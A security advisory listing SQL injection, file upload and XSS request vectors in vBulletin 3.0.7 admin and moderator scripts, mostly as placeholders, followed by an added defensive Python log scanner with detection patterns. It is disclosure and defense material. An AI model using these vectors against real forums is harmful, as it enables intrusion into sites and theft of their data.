Product: vBulletin
URL: http://vbulletin.com
Version: <= vBulletin 3.0.7
Vulnerability: SQL injection and arbitrary file upload

SQL injection:

/joinrequests.php:
  POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>

/modcp/announcement.php:
  POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05&announcement[0]=[SQL-Injection]>

/modcp/thread.php:
  POST: <do=dothreads&thread[forumid]=0XF>
  POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>

/modcp/user.php:
  GET: <do=avatar&userid=0XF>

/admincp/admincalendar.php:
  GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
  GET: <do=addmod&calendarid=[SQL-Injection]>
  GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
  GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
  POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
  GET: <do=edit&calendarid=[SQL-Injection]>
  POST: <do=kill&calendarid=[SQL-Injection]>
  POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
  GET: <do=remove&calendarid=[SQL-Injection]>
  POST: <do=removemod&moderatorid=[SQL-Injection]>
  POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
  POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
  GET: <do=updateholiday&holidayid=0XF>
  POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&calendar[0]=[SQL-Injection]>
  POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
  POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>

/admincp/cronlog.php:
  POST: <do=doprunelog&cronid=0XF>
  POST: <do=prunelog&cronid=0XF>

/admincp/email.php:
  POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>

/admincp/help.php:
  POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>

/admincp/user.php:
  GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
  GET: <do=find&orderby=username&limitstart=[SQL-Injection]>

/admincp/usertitle.php:
  GET: <do=edit&usertitleid=0XF>
  GET: <do=pmuserstats&ids=0XF>

/admincp/language.php:
  POST: <do=update&rvt[0]=[SQL-Injection]>

/admincp/phrase.php:
  POST: <do=completeorphans&keep[0]=[SQL-Injection]>

/admincp/template.php:
  GET: <do=editstyle&dostyleid=[SQL-Injection]>
  POST: <do=revertall&dostyleid=[SQL-Injection]>

/admincp/thread.php:
  POST: <do=dothreads&thread[forumid]=0XF>

/admincp/usertools.php:
  POST: <do=updateprofilepic>

/admincp/vbugs_admin.php:
  GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
  GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
  GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

Arbitrary file upload:

/admincp/image.php:
  POST: <do=upload&table=avatar>
  POST: <do=upload&table=icon>
  POST: <do=upload&table=smilie>

XSS:

/modcp/index.php:
  GET: <do=frames&loc=[XSS]>

/modcp/user.php:
  GET: <do=gethost&ip=[XSS]>

/admincp/css.php:
  GET: <do=doedit&dostyleid=1&group=[XSS]>

/admincp/index.php:
  GET: <redirect=[XSS]>
  GET: <do=frames&loc=[XSS]>

/admincp/user.php:
  GET: <do=emailpassword&email=[XSS]>

/admincp/usertitle.php:
  GET: <do=gethost&ip=[XSS]>

/admincp/language.php:
  GET: <do=rebuild&goto=[XSS]>

/admincp/modlog.php:
  GET: <do=view&orderby=[XSS]>

/admincp/template.php:
  GET: <do=colorconverter&hex=[XSS]>
  GET: <do=colorconverter&rgb=[XSS]>
  GET: <do=modify&expandset=[XSS]>

Fix: upgrade to vBulletin 3.0.9
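As an added defender-side example that is not part of the original advisory, the Python below scans web-server access-log lines for GET requests to the scripts listed above whose id parameters are non-numeric, whose input has an SQL-like shape, or whose reflected parameters carry markup, which is how an administrator of an unpatched 3.0.7 install could triage logs while upgrading to 3.0.9. The script and parameter sets are taken from the advisory; the log format, the `flag_request`/`scan` helpers and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts named in the advisory (admincp/modcp panels plus joinrequests.php).
ADVISORY_SCRIPTS = {
    "/joinrequests.php", "/modcp/announcement.php", "/modcp/thread.php",
    "/modcp/user.php", "/modcp/index.php", "/admincp/admincalendar.php",
    "/admincp/cronlog.php", "/admincp/email.php", "/admincp/help.php",
    "/admincp/user.php", "/admincp/usertitle.php", "/admincp/language.php",
    "/admincp/phrase.php", "/admincp/template.php", "/admincp/thread.php",
    "/admincp/usertools.php", "/admincp/vbugs_admin.php", "/admincp/image.php",
    "/admincp/css.php", "/admincp/index.php", "/admincp/modlog.php"}
# Parameters the advisory shows reaching SQL; every one of them should be an integer.
ID_PARAMS = {"userid", "calendarid", "holidayid", "cronid", "usertitleid", "ids",
             "dostyleid", "moderatorid", "announcementid", "usergroupid", "forumid",
             "limitstart", "limitnumber", "vbug_severityid", "calendarcustomfieldid"}
# Parameters the advisory shows reflected into HTML; markup in them is unexpected.
XSS_PARAMS = {"loc", "ip", "goto", "redirect", "orderby", "hex", "rgb",
              "expandset", "group", "email"}
SQL_SHAPE = re.compile(r"""['"`;]|--|/\*|\ba:\d+:\{""")  # quotes, comments, serialized array
MARKUP = re.compile(r"[<>]")
# Assumed combined-log-format line: ip ident user [time] "METHOD target proto" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) [^"]*" (\d{3})')

def flag_request(line):
    """Return (client_ip, path, reason) when a log line matches one of the
    advisory's GET vectors, else None. POST bodies are not in access logs, so
    the POST vectors need application-layer or WAF logging instead."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, _method, target, _status = m.groups()
    parts = urlsplit(target)
    if parts.path not in ADVISORY_SCRIPTS:
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        names = set(re.findall(r"\w+", key))      # thread[forumid] -> {thread, forumid}
        if names & ID_PARAMS and not value.isdigit():
            return ip, parts.path, f"non-numeric id in {key}={value!r}"
        if SQL_SHAPE.search(key + "=" + value):   # the key itself can carry the payload
            return ip, parts.path, f"sql-like input in {key}={value!r}"
        if names & XSS_PARAMS and MARKUP.search(value):
            return ip, parts.path, f"markup in {key}={value!r}"
    return None

def scan(lines):
    """Run flag_request over an iterable of log lines and keep the hits."""
    return [hit for hit in map(flag_request, lines) if hit]

# Constructed sample log lines (not real traffic); the first and third should be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2005:12:00:00 +0000] "GET /admincp/usertitle.php?do=edit&usertitleid=0XF HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Aug/2005:12:00:01 +0000] "GET /admincp/usertitle.php?do=edit&usertitleid=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Aug/2005:12:00:02 +0000] "GET /modcp/index.php?do=frames&loc=%3Cb%3E HTTP/1.1" 200 90',
    '10.0.0.9 - - [01/Aug/2005:12:00:03 +0000] "GET /forumdisplay.php?f=1 HTTP/1.1" 200 9000',
]
```

Only GET vectors are visible in access logs; the upload and most SQL vectors in the list are POST requests, so treat a clean access log as necessary but not sufficient evidence.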